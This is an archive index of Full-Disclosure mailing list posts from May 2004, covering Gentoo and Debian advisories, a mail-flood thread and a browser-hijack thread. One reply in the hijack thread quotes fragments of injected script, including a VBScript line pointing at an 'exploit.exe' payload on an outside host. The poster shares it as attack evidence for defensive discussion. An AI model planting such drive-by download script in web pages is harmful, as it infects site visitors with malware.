[Full-Disclosure] [ GLSA 200405-18 ] Buffer Overflow in Firebird

2004-05-23 Thread Thierry Carrez
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200405-18 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

[Full-Disclosure] browser hijack by apache sites

2004-05-23 Thread Filbert
Hi, This is the second time this weekend that I've been warned of an apache site on a Linux server were a line of code was added to redirect browsers to porn sites. First was the site of a Belgian political party. Second came today, and as of writing this it's still there. The admin was

Re: [Full-Disclosure] C# Web application security scanner

2004-05-23 Thread Ondrej Krajicek
On Fri, May 21, 2004 at 10:13:41AM -0700, Denis Dimick wrote: As soon as I saw the C# I knew it was a troll.. Well, why? It's just a programming language, the tool not the purpose. AFAIK, one of the better designed... This not a troll-feeder, I am really interested in a reason why C# is a

[Full-Disclosure] [SECURITY] [DSA 508-1] New xpcd packages fix buffer overflow

2004-05-23 Thread debian-security-announce
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 508-1 [EMAIL PROTECTED] http://www.debian.org/security/ Matt Zimmerman May 22nd, 2004

[Full-Disclosure] Gentoo-announce flood

2004-05-23 Thread José María Mateos
Hi, Are you receiving a lot of gentoo-announces mail today or is it just me? Some of them from serveral days ago? Regards -- ** Blog Overflow: http://chema.homelinux.org ** No software patents in Europe http://EuropeSwPatentFree.hispalinux.es - EuropeSwPatentFree

Re: [Full-Disclosure] browser hijack by apache sites

2004-05-23 Thread D B
using konqueror i got it to download these two files Filename 1: 2DimensionOfExploitsEnc.php html script language=vbs szURL = http://www.pizdato.biz/acc1/exploit.exe; /script script language=VBScript.Encode Filename 2: object2.cfm script language=jscript self.moveTo(5000,5000);

Re: [Full-Disclosure] Gentoo-announce flood

2004-05-23 Thread Tobias Weisserth
Hi, On Sun, 2004-05-23 at 19:01, José María Mateos wrote: Hi, Are you receiving a lot of gentoo-announces mail today or is it just me? Some of them from serveral days ago? You're not alone. They seem to have trouble with their mail? regards, Tobias

Re: [Full-Disclosure] Gentoo-announce flood

2004-05-23 Thread KF (lists)
When you cc multiple lists in the same email the tend to send out multiple copies... this is nothing new. -KF Tobias Weisserth wrote: Hi, On Sun, 2004-05-23 at 19:01, José María Mateos wrote: Hi, Are you receiving a lot of gentoo-announces mail today or is it just me? Some of them

Re: [Full-Disclosure] Gentoo-announce flood

2004-05-23 Thread KF (lists)
I am certainly not mocking anyone... no need to imply that I was. I was simply stating that this sort of thing has happened before with other vendors posts as well as other individuals posting. *flame on* we I love this list. -KF Luke Norman wrote: KF (lists) wrote: When you cc multiple

Re: [Full-Disclosure] Gentoo-announce flood

2004-05-23 Thread Luke Norman
KF (lists) wrote: When you cc multiple lists in the same email the tend to send out multiple copies... this is nothing new. -KF If he is talking about the same problem that I am having, where multiple copies of week-old e-mails are appearing from the same list/address, then this is nothing new.

Re: [Full-Disclosure] The Alexis de Tocqueville Institution

2004-05-23 Thread David Huecking
Have a look at Andrew Tanenbaum's comment on Ken Brown, president of Alexis de Tocqueville visit for an interview with him. http://www.cs.vu.nl/~ast/brown/ Tanenbaum says that Brown has more or less no idea on developing software or even history of UNIX. On Samstag, 22. Mai 2004 19:58, [EMAIL

Re[2]: [Full-Disclosure] Gentoo-announce flood

2004-05-23 Thread hggdh
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello KF, Sunday, May 23, 2004, 1:31:41 PM, you wrote: Kl I am certainly not mocking anyone... no need to imply that I was. I was Kl simply stating that this sort of thing has happened before with other Kl vendors posts as well as other individuals

[Full-Disclosure] !! Conference Program Computer Security Mexico 2004 !!

2004-05-23 Thread Juan Carlos Guel Lopez
-BEGIN PGP SIGNED MESSAGE- Computer Security Mexico 2004 10th Years celebrating Computer Security Mexico Antiguo Colegio de San Ildefonso

Re:[Full-Disclosure] browser hijack by apache sites

2004-05-23 Thread Ian Latter
Hello Flibert, I keep watching my auto-patching XP Home junk-box getting done with techniques like this, while some rarely-patched XP Pros that I look in, on, aren't. I don't care anough about my junk machine to lock it down, but the number of these browser hijacks is a bit much .. the last one